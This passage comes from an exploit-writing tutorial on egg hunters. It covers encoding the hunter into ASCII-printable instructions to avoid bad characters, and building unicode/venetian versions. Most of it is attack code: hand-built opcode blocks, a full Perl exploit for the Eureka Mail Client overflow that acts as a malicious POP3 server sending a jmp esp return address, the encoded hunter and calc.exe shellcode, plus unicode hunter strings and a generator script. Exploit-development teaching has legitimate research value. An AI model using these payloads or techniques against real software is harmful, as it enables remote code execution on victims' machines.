25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n54               PUSH ESP\n58               POP EAX\n2D 314D5555      SUB EAX,55554D31\n2D 314B5555      SUB EAX,55554B31\n2D 35515555      SUB EAX,55555135\n50               PUSH EAX\n41               INC ECX\n41               INC ECX\n25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n2D 21555555      SUB EAX,55555521\n2D 21545555      SUB EAX,55555421\n2D 496F556D      SUB EAX,6D556F49\n50               PUSH EAX\n41               INC ECX\n41               INC ECX\n25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n2D 71216175      SUB EAX,75612171\n2D 71216175      SUB EAX,75612171\n2D 6F475365      SUB EAX,6553476F<\/pre>\n
wow - that doesn\u2019t look like the egg hunter we know, does it ?<\/p>\n
Let\u2019 see what it does. The first 4 instructions empty EAX (2 logical AND operations) and the pointer in ESP is put on the stack (which points to the beginning of the encoded egghunter).\u00a0 Next, this value is popped into EAX. So EAX effectively points to the beginning of the egghunter after these 4 instructions :<\/p>\n
25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n54               PUSH ESP\n58               POP EAX<\/pre>\n
Next, the value in EAX is changed (using a series of SUB instructions). Then the new value in EAX is pushed onto the stack, and ECX is increased with 2 :<\/p>\n
2D 314D5555      SUB EAX,55554D31\n2D 314B5555      SUB EAX,55554B31\n2D 35515555      SUB EAX,55555135\n50               PUSH EAX\n41               INC ECX\n41               INC ECX<\/pre>\n
(The value that is calculated in EAX is going to be important later on !\u00a0 I\u2019ll get back to this in a minute)<\/p>\n
 <\/p>\n
Then, eax is cleared again (2 AND operations), and using the 3 SUB instructions on EAX, a value is pushed onto the stack.<\/p>\n
\"image\"<\/a><\/p>\n
So before SUB EAX,55555521 is run, EAX = 00000000.\u00a0 When the first SUB ran, EAX contains AAAAAADF. After the second sub, EAX contains 555556BE, and after the third SUB, eax contains E7FFE775.\u00a0 Then, this value is pushed onto the stack.<\/p>\n
Wait a minute. This value looks familiar to me. 0xE7, 0xFF, 0xE7, 0x75 are in fact the last 4 bytes of the NtAccessCheckAndAuditAlarm egg hunter (in reversed order).\u00a0 Nice.<\/p>\n
If you continue to run the code, you\u2019ll see that it will reproduce the original egg hunter. (but in my testcase, using a different exploit, the code does not work)<\/p>\n
Anyways, the code muts used is in fact an encoder that will reproduce the original egg hunter, put it on the stack, and will run the reproduced code, effectively bypassing bad char limitations (because the entire custom made encoder did not use any of the bad chars.) Simply genial !\u00a0 I had never seen an implementation of this encoder before this particular exploit was published. Really well done muts !<\/p>\n
Of course, if the AND, PUSH, POP, SUB, INC opcodes are in the list of badchars as well, then you may have a problem, but you can play with the values for the SUB instructions in order to reproduce the original egg hunter, keep track of the current location where the egghunter is reproduced (on the stack) and finally \u201cjump\u201d to it.<\/p>\n
How is the jump made ?<\/p>\n
If you have to deal with a limited character set (only alphanumerical ascii-printable characters allowed for example), then a jmp esp, or push esp+ret, \u2026 won\u2019t work because these instructions may invalid characters. If you don\u2019t have to deal with these characters, then simply add a jump at the end of the encoded hunter and you\u2019re all set.<\/p>\n
Let\u2019s assume that the character set is limited, so we must find another way to solve this\u00a0 Remember when I said earlier that certain instructions were going to be important ?\u00a0 Well this is where it will come into play. If we cannot make the jump, we need to make sure the code starts executing automatically. The best way to do this is by writing the decoded egg hunter right after the encoded code\u2026 so when the encoded code finished reproducing the original egg hunter, it would simply start executing this reproduced egg hunter.<\/p>\n
That means that a value must be calculated, pointing to a location after the encoded hunter, and this value must be put in ESP before starting to decode. This way, the decoder will rebuild the egg hunter and place it right after the encoded hunter.\u00a0 We\u2019ll have a closer look at this in the next chapter.<\/p>\n
 <\/p>\n
Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder ?<\/h4>\n
The framework for building the encoded egghunter (or decoder if that\u2019s what you want to call it) looks like this :<\/p>\n
- set up the stack & registers (calculate where the decoded hunter must be written. This will be the local position + length of the encoded code (which will be more or less the same size). Calculating where the decoder must be written to requires you to evaluate the registers when the encoded hunter would start running. If you have made your way to the encoded hunter via a jmp esp, then esp will contain the current location, and you can simply increase the value until it points to the right location. )<\/p>\n
- reproduce each 4 bytes of the original egg hunter on the stack, right after the encoded hunter (using 2 AND\u2019s to clear out EAX, 3 SUBs to reproduce the original bytes, and a PUSH to put the reproduced code on the stack)<\/p>\n
- When all bytes have been reproduced, the decoded egg hunter should kick in.<\/p>\n
First, let\u2019s build the encoder for the egghunter itself.\u00a0 You have to start by grouping the egg hunter in sets of 4 bytes. We have to start with the last 4 bytes of the code (because we will push values to the stack each time we reproduce the original code... so at the end, the first bytes will be on top) Our NtAccessCheckAndAuditAlarm egg hunter is 32 bytes, so that\u2019s nicely aligned.\u00a0 But if it\u2019s not aligned, you can add more bytes (nops) to the bottom of the original egg hunter, and start bottom up, working in 4 byte groups.<\/p>\n
\\x66\\x81\\xCA\\xFF\n\\x0F\\x42\\x52\\x6A\n\\x02\\x58\\xCD\\x2E\n\\x3C\\x05\\x5A\\x74\n\\xEF\\xB8\\x77\\x30<\/span><\/strong>   ;w0\n\\x30\\x74<\/span><\/strong>\\x8B\\xFA   ;0t\n\\xAF\\x75\\xEA\\xAF\n\\x75\\xE7\\xFF\\xE7<\/pre>\n
The code used by muts will effectively reproduce the egghunter (using W00T as tag). After the code has run, this is what is pushed on the stack :<\/p>\n
\"image\"<\/a><\/p>\n
Nice.<\/p>\n
2 questions remain however : how do we jump to that egg hunter now, and what if you have to write the encoded egg hunter yourself ?\u00a0 Let\u2019s look at how it\u2019s done :<\/p>\n
Since we have 8 lines of 4 bytes of egg hunter code, you will end up with 8 blocks of encoded code. The entire code should only using alphanumeric ascii-printable characters, and should not use any of the bad chars.\u00a0 (check http:\/\/www.asciitable.com\/<\/a>)\u00a0 The first printable char starts at 0x20 (space) or 0x21, and ends at 7E<\/p>\n
Each block is used to reproduce 4 bytes of egg hunter code, using SUB instructions. The way to calculate the values to use in the SUB instructions is this :<\/p>\n
take one line of egg hunter code, reverse the bytes !, and get its 2\u2019s complement (take all bits, invert them, and add one) (Using Windows calculator, set it to hex\/dword, and calculate \u201c0 - value\u201d). For the last line of the egg hunter code (0x75E7FFE7 -> 0xE7FFE775) this would be 0x1800188B (= 0 - E7FFE775).<\/p>\n
Then find 3 values that only use alphanumeric characters (ascii-printable), and are not using any of the bad chars (\\x40\\x3f\\x3a\\x2f)\u2026 and when you sum up these 3 values, you should end up at the 2\u2019s complement value (0x1800188B in case of the last line) again.\u00a0 (by the way, thanks ekse<\/em> for working with me finding the values in the list below \ud83d\ude42 That was fun !)<\/p>\n
The resulting 3 values are the ones that must be used in the sub,eax <\u2026.> instructions.<\/p>\n
Since bytes will be pushed to the stack, you have to start with the last line of the egg hunter first (and don\u2019t forget to reverse the bytes of the code), so after the last push to the stack, the first bytes of the egg hunter would be located at ESP.<\/p>\n
In order to calculate the 3 values, I usually do this :<\/p>\n
- calculate the 2\u2019s complement of the reversed bytes<\/p>\n
- start with the first bytes in the 2\u2019s complement. (18 in this case), and look for 3 values that, when you add them together, they will sum up to 18.\u00a0 You may have to overflow in order to make it work (because you are limited to ascii-printable characters).\u00a0 So simply using 06+06+06 won\u2019t work as 06 is not a valid character.\u00a0 In that case, we need to overflow and go to 118.\u00a0 I usually start by taking a value somewhere between 55 (3 times 55 = 0 again)\u00a0 and 7F (last character). Take for example 71.\u00a0 Add 71 to 71 = E2.\u00a0 In order to get from E2 to 118, we need to add 36, which is a valid character, so we have found our first bytes (see red).\u00a0 This may not be the most efficient method to do this, but it works.\u00a0 (Tip : windows calc : type in the byte value you want to get to, divide it by 3 to know in what area you need to start looking)<\/p>\n
Then do the same for the next 3 bytes in the 2\u2019s complement.\u00a0 Note : if you have to overflow to get to a certain value, this may impact the next bytes.\u00a0 Just add the 3 values together at the end, and if you had an overflow, you have to subtract one again from one of the next bytes in one of the 3 values.\u00a0 Just try, you\u2019ll see what I mean.\u00a0 (and you will find out why the 3rd value starts with 35 instead of 36)<\/p>\n
Last line of the (original) egg hunter :<\/p>\n
x75 xE7 xFF xE7 -> xE7 xFF xE7 x75: (2\u2019s complement : 0x1800188B)\n-----------------------------------------------------------------\nsub eax, 0x71557130     (=> \"\\x2d\\x30\\x71\\x55\\x71\")  (Reverse again !)\nsub eax, 0x71557130     (=> \"\\x2d\\x30\\x71\\x55\\x71\")\nsub eax, 0x3555362B     (=> \"\\x2d\\x2B\\x36\\x55\\x35\")\n=> sum of these 3 values is 0x11800188B  (or 0x1800188B in dword)<\/pre>\n
 <\/p>\n
Let\u2019s look at the other ones.\u00a0 Second last line of the (original) egg hunter :<\/p>\n
xAF x75 xEA xAF -> xAF xEA x75 xAF: (2\u2019s complement : 0x50158A51)\n-----------------------------------------------------------------\nsub eax, 0x71713071\nsub eax, 0x71713071\nsub eax, 0x6D33296F<\/pre>\n
and so on\u2026<\/p>\n
x30 x74 x8B xFA -> xFA x8B x74 x30: (2\u2019s complement : 0x05748BD0)\n-----------------------------------------------------------------\nsub eax, 0x65253050\nsub eax, 0x65253050\nsub eax, 0x3B2A2B30<\/pre>\n
xEF xB8 x77 x30 -> x30 x77 xB8 xEF: (2\u2019s complement : 0xCF884711)\n-----------------------------------------------------------------\nsub eax, 0x41307171\nsub eax, 0x41307171\nsub eax, 0x4D27642F<\/pre>\n
x3C x05 x5A x74  -> x74 x5A x05 x3C: (2\u2019s complement : 0x8BA5FAC4)\n------------------------------------------------------------------\nsub eax, 0x30305342\nsub eax, 0x30305341\nsub eax, 0x2B455441<\/pre>\n
x02 x58 xCD x2E -> x2E xCD x58 x02: (2\u2019s complement : 0xD132A7FE)\n-----------------------------------------------------------------\nsub eax, 0x46663054\nsub eax, 0x46663055\nsub eax, 0x44664755<\/pre>\n
x0F x42 x52 x6A -> x6A x52 x42 x0F: (2\u2019s complement : 0x95ADBDF1)\n-----------------------------------------------------------------\nsub eax, 0x31393E50\nsub eax, 0X32393E50\nsub eax, 0x323B4151<\/pre>\n
Finally, the first line :<\/p>\n
x66 x81 xca xff -> xff xca x81 x66 (2\u2019s complement : 0x00357E9A)\n----------------------------------------------------------------\nsub eax, 0x55703533\nsub eax, 0x55702533\nsub eax, 0x55552434<\/pre>\n
 <\/p>\n
Each of these blocks must be prepended with code that would zero-out EAX :<\/p>\n
Example :<\/p>\n
AND EAX,554E4D4A   (\"\\x25\\x4A\\x4D\\x4E\\x55\")\nAND EAX,2A313235   (\"\\x25\\x35\\x32\\x31\\x2A\")<\/pre>\n
(2 times 5 bytes)<\/p>\n
Each block must be followed by a push eax (one byte, \u201c\\x50\u201d) instruction which will put the result (one line of egg hunter code) on the stack. Don\u2019t forget about it, or your decoded egg hunter won\u2019t be placed on the stack.<\/p>\n
So : each block will be 10 (zero eax) + 15 (decode) +1 (push eax) = 26 bytes. We have 8 blocks, so we have 208 bytes already.<\/p>\n
Note, when converting the sub eax,<value> instructions to opcode, don\u2019t forget to reverse the bytes of the values again\u2026\u00a0 so sub eax,0x476D556F would become \u201c\\x2d\\x6f\\x55\\x6d\\x47\u201d<\/p><\/blockquote>\n
 <\/p>\n
The next thing that we need to do is make sure that the decoded egg hunter will get executed after it was reproduced.<\/p>\n
In order to do so, we need to write it in a predictable location and jump to it, or we need to write it directly after the encoded hunter so it gets executed automatically.<\/p>\n
If we can write in a predictable location (because we can modify ESP before the encoded hunter runs), and if we can jump to the beginning of the decoded hunter (ESP) after the encoded hunter has completed, then that will work fine.<\/p>\n
Of course, if you character set is limited, then you may not be able to add a \u201cjmp esp\u201d or \u201cpush esp\/ret\u201d or anything like that at the end of the encoded hunter.\u00a0\u00a0\u00a0 If you can - then that\u2019s good news.<\/p>\n
If that is not possible, then you will need to write the decoded egg hunter right after the encoded version.\u00a0 So when the encoded version stopped reproducing the orginal code, it would start executing it.\u00a0 In order to do this, we must calculate where we should write the decoded egg hunter to.\u00a0 We know the number of bytes in the encoded egg hunter, so we should try to modify ESP accordingly (and do so before the decoding process begins) so the decoded bytes would be written directly after the encoded hunter.<\/p>\n
The technique used to modify ESP depends on the available character set.\u00a0 If you can only use ascii-printable characters, then you cannot use add or sub or mov operations\u2026\u00a0 One method that may work is running a series of POPAD instructions to change ESP and make it point below the end of the encoded hunter.\u00a0 You may have to add some nops at the end of the encoded hunter, just to be on the safe side.\u00a0 (\\x41 works fine as nop when you have to use ascii-printable characters only)<\/p>\n
Wrap everything up, and this is what you\u2019ll get :<\/p>\n
Code to modify ESP (popad) + Encoded hunter (8 blocks : zero out eax, reproduce code, push to stack) + some nops if necessary\u2026<\/p>\n
When we apply this technique to the Eureka Mail Client exploit, we get this :<\/p>\n
use<\/span> Socket;\n#fill out the local<\/span> IP or hostname\n#which is used by Eureka EMail as POP<\/span>3 server\n#note : must be exact match !\nmy<\/span> $localserver = \"192.168.0.193<\/span>\";\n#calculate offset<\/span> to EIP\nmy<\/span> $junk = \"A<\/span>\" x (723 - length<\/span>($localserver));\nmy<\/span> $ret=pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\nmy<\/span> $padding = \"\\x90<\/span>\" x 1000;\n\n#alphanumeric ascii-printable encoded + bad chars\n# tag = w00t\nmy<\/span> $egghunter =\n#popad - make ESP point below the encoded hunter\n\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61<\/span>\".\n#-----8 blocks encoded hunter---------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x30\\x71\\x55\\x71<\/span>\".   #x75 xE7 xFF xE7\n\"\\x2d\\x30\\x71\\x55\\x71<\/span>\".\n\"\\x2d\\x2B\\x36\\x55\\x35<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#--------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x71\\x30\\x71\\x71<\/span>\".   #xAF x75 xEA xAF\n\"\\x2d\\x71\\x30\\x71\\x71<\/span>\".\n\"\\x2d\\x6F\\x29\\x33\\x6D<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#--------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x50\\x30\\x25\\x65<\/span>\".   #x30 x74 x8B xFA\n\"\\x2d\\x50\\x30\\x25\\x65<\/span>\".\n\"\\x2d\\x30\\x2B\\x2A\\x3B<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#---------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x71\\x71\\x30\\x41<\/span>\".   #xEF xB8 x77 x30\n\"\\x2d\\x71\\x71\\x30\\x41<\/span>\".\n\"\\x2d\\x2F\\x64\\x27\\x4d<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#---------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x42\\x53\\x30\\x30<\/span>\".   #x3C x05 x5A x74\n\"\\x2d\\x41\\x53\\x30\\x30<\/span>\".\n\"\\x2d\\x41\\x54\\x45\\x2B<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#---------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x54\\x30\\x66\\x46<\/span>\".   #x02 x58 xCD x2E\n\"\\x2d\\x55\\x30\\x66\\x46<\/span>\".\n\"\\x2d\\x55\\x47\\x66\\x44<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#---------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x50\\x3e\\x39\\x31<\/span>\".   #x0F x42 x52 x6A\n\"\\x2d\\x50\\x3e\\x39\\x32<\/span>\".\n\"\\x2d\\x51\\x41\\x3b\\x32<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#----------------------------\n\"\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"\\x2d\\x33\\x35\\x70\\x55<\/span>\".   #x66 x81 xCA xFF\n\"\\x2d\\x33\\x25\\x70\\x55<\/span>\".\n\"\\x2d\\x34\\x24\\x55\\x55<\/span>\".\n\"\\x50<\/span>\".                   #push<\/span> eax\n#------------------------------\n\"\\x41\\x41\\x41\\x41<\/span>\";       #some nops\n\n#calc.exe\nmy<\/span> $shellcode=\"\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\nmy<\/span> $payload=$junk.$ret.$egghunter.$padding.\"w00tw00t<\/span>\".$shellcode;\n\n#set up listener on port 110\nmy<\/span> $port=110;\nmy<\/span> $proto=getprotobyname<\/span>('tcp');\nsocket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\nmy<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\nbind<\/span>(SERVER,$paddr);\nlisten<\/span>(SERVER,SOMAXCONN);\nprint<\/span> \"[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\nprint<\/span> \"[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\nmy<\/span> $client_addr;\nwhile($client_addr=accept<\/span>(CLIENT,SERVER))\n{\n  print<\/span> \"[+] Client connected, sending evil payload\\n<\/span>\";\n  my<\/span> $cnt=1;\n  while($cnt<10)\n  {\n     print<\/span> CLIENT \"-ERR <\/span>\".$payload.\"\\n<\/span>\";\n\t print<\/span> \" -> Sent <\/span>\".length<\/span>($payload).\" bytes\\n<\/span>\";\n\t $cnt=$cnt+1;\n  }\n}\nclose<\/span> CLIENT;\nprint<\/span> \"[+] Connection closed\\n<\/span>\";<\/pre>\n
\"image\"<\/a><\/p>\n
\"image\"<\/a><\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
You may or may not be able to use this code in your own exploit - after all, this code was handmade and based on a given list of bad chars, offset required to end up writing after encoded hunter and so on.<\/p>\n
Just take into account that this code will be (a lot) longer (so you\u2019ll need a bigger buffer) than the unencoded\/original egghunter. The code I used is 220 bytes \u2026<\/p><\/blockquote>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
What if your payload is subject to unicode conversion ? (All your 00BB00AA005500EE are belong to us !)<\/h3>\n
Good question !<\/p>\n
Well, there are 2 scenario's were there may be a way to make this work :<\/p>\n
Scenario 1 : An ascii version of the payload can be found somewhere in memory.<\/h4>\n
This sometimes happens and it's worth while investigating.\u00a0 When data is accepted by the application in ascii, and stored in memory before it gets converted to unicode, then it may be still stored (and available) in memory when the overflow happens.<\/p>\n
A good way to find out if your shellcode is available in ascii is by writing the shellcode to a file, and use the !pvefindaddr compare <filename> feature.\u00a0 If the shellcode can be found, and if it\u2019s not modified\/corrupted\/converted to unicode in memory, the script will report this back to you.<\/p>\n
In that scenario, you would need to<\/p>\n
- convert the egg hunter into venetian shellcode and get that executed. (The egg hunter code will be a lot bigger than it was when it was just ascii so available buffer space is important)<\/p>\n
- put your real shellcode (prepended with the marker) somewhere in memory. The marker and the shellcode must be in ascii.<\/p>\n
When the venetian egghunter kicks in, it would simply locate the ascii version of the shellcode in memory and execute it. Game over.<\/p>\n
Converting the egg hunter as venetian shellcode is as easy as putting the egghunter (including the tag) in a file, and using alpha2 (or the recently released alpha3<\/a> (by skylined)) to convert it to unicode (pretty much as explained in my previous tutorial about unicode)<\/p>\n
In case you\u2019re too tired to do it yourself, this is a unicode version of the egghunter, using w00t as tag, and using EAX as base register :<\/p>\n
#Corelan Unicode egghunter - Basereg=EAX - tag=w00t\nmy<\/span> $egghunter = \"PPYAIAIAIAIAQATAXAZAPA3QADAZ<\/span>\".\n\"ABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAX<\/span>\".\n\"A58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA<\/span>\".\n\"BAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ4<\/span>\".\n\"4JO7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA<\/span>\";<\/pre>\n
The nice thing about unicode egg hunters is that it is easier to tweak the start location of where the egg hunter will start the search, if that would be required.<\/p>\n
Remember when we talked about this a little bit earlier ?\u00a0 If the egg+shellcode can be found on the stack, then why search through large pieces of memory if we can find it close to where the egg hunter is.\u00a0 The nice thing is that you can create egghunter code that contains null bytes, because these bytes won\u2019t be a problem here.<\/p>\n
So if you want to replace \u201c\\x66\\x81\\xCA\\xFF\\x0F\u201d\u00a0 with \u201c\\x66\\x81\\xCA\\x00\\x00\u201d to influence the start location of the hunter, then be my guest. (In fact, this is what I have done when I created the unicode egghunter, not because I had to, but merely because I wanted to try).<\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
Scenario 2 : Unicode payload only<\/h4>\n
In this scenario, you cannot control contents of memory with ascii shellcode, so basically everything is unicode.<\/p>\n
It\u2019s still doable, but it will take a little longer to build a working exploit.<\/p>\n
First of all, you still need a unicode egghunter, but you will need to make sure the tag\/marker is unicode friendly as well. After all, you will have to put the tag before the real shellcode (and this tag will be unicode).<\/p>\n
In addition to that, you will need to align registers 2 times : one time to execute the egg hunter, and then a second time, between the tag and the real shellcode (so you can decode the real shellcode as well). So, in short :<\/p>\n
- Trigger overflow and redirect execution to<\/p>\n
- code that aligns register and adds some padding if required, and then jumps to<\/p>\n
- unicode shellcode that would self-decode and run the egg hunter which would<\/p>\n
- look for a double tag in memory (locating the egg - unicode friendly) and then<\/p>\n
- execute the code right after the tag, which would need to<\/p>\n
- align register again, add some padding, and then<\/p>\n
- execute the unicode (real) shellcode (which will decode itself again and run the final shellcode)<\/p>\n
 <\/p>\n
We basically need to build a venetian egghunter that contains a tag, which can be used to prepend the real shellcode, and is unicode friendly.\u00a0 In the examples above, I have used w00t as tag, which in hex is 0x77,0x30,0x30,0x74\u00a0 (= w00t reversed because of little endian).\u00a0 So if we would replace the first and third byte with null byte, it would become\u00a0 0x00,0x30,0x00,0x74 (or, in ascii :\u00a0\u00a0 t - null - 0 - null)<\/p>\n
A little script that will write the egghunter in a binary form to a file would be :<\/p>\n
#!\/usr\/bin\/perl\n# Little script to write<\/span> egghunter shellcode to file\n# 2 files will be created :\n# - egghunter.bin : contains w00t as tag\n# - egghunterunicode.bin : contains 0x00,0x30,0x00,0x74 as tag\n#\n# Written by Peter Van Eeckhoutte\n# http:\/\/www.corelan.be<\/span>\n#\nmy<\/span> $egghunter =\n\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\"; \n\nprint<\/span> \"Writing egghunter with tag w00t to file egghunter.bin...\\n<\/span>\";\nopen<\/span>(FILE,\">egghunter.bin<\/span>\");\nprint<\/span> FILE $egghunter;\nclose<\/span>(FILE); \n\nprint<\/span> \"Writing egghunter with unicode tag to file egghunter.bin...\\n<\/span>\";\nopen<\/span>(FILE,\">egghunterunicode.bin<\/span>\");\nprint<\/span> FILE \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C<\/span>\";\nprint<\/span> FILE \"\\x05\\x5A\\x74\\xEF\\xB8<\/span>\";\nprint<\/span> FILE \"\\x00<\/span>\";\u00a0\u00a0 #null\nprint<\/span> FILE \"\\x30<\/span>\";\u00a0\u00a0 #0\nprint<\/span> FILE \"\\x00<\/span>\";\u00a0\u00a0 #null\nprint<\/span> FILE \"\\x74<\/span>\";\u00a0\u00a0 #t\nprint<\/span> FILE \"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";\nclose<\/span>(FILE);<\/pre>\n
(as you can see, it will also write the ascii egghunter to a file - may come handy one day)<\/p>\n
Now convert the egghunterunicode.bin to venetian shellcode :<\/p>\n
.\/alpha2 eax --unicode --uppercase < egghunterunicode.bin\nPPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI\n1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABA\nBABAB30APB944JBQVSQGZKOLOORB2BJLB0XHMNNOLLEPZ3DJO6XKPNPKP\nRT4KZZVO2UJJ6ORUJGKOK7A<\/pre>\n
When building the unicode payload, you need to prepend the unicode compatible tag string to the real (unicode) shellcode :\u00a0 \u201c0t0t\u201d (without the quotes of course). When this string gets converted to unicode, it becomes 0x00 0x30 0x00 0x74 0x00 0x30 0x00 0x74\u2026 and that corresponds with the marker what was put in the egghunter before it was converted to unicode - see script above)<\/p>\n
Between this 0t0t tag and the real (venetian) shellcode that needs to be placed after the marker, you may have to include register alignment, otherwise the venetian decoder will not work. If, for example, you have converted your real shellcode to venetian shellcode using eax as basereg, you\u2019ll have to make the beginning of the decoder point to the register again\u2026\u00a0\u00a0 If you have read tutorial part<\/a> 7, you know what I\u2019m talking about.<\/p>\n
In most cases, the egghunter will already put the current stack address in EDI (because it uses that register to keep track of the location in memory where the egg tag is located. Right after the tag is found, this register points to the last byte of the tag). So it would be trivial to (for example) move edi into eax and increase eax until it points to the address where the venetian shellcode is located, or to just modify edi (and use venetian shellcode generated using edi as base register)<\/p>\n
The first instruction for alignment will start with null byte (because that\u2019s the last byte of the egg tag (30 00 74 00 30 00 74 00 )that we have used).\u00a0 So we need to start alignment with an instruction that is in the 00 xx 00 form.\u00a0\u00a0 00 6d 00 would work (and others will work too).<\/p>\n
Note : make sure the decoder for the venetian shellcode does not overwrite any of the egg hunter or eggs itself, as it obviously will break the exploit.<\/p><\/blockquote>\n
Let\u2019s see if the theory works<\/h4>\n
